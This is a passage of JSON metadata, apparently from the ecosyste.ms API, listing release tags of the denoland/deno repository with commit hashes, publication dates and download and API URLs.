rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"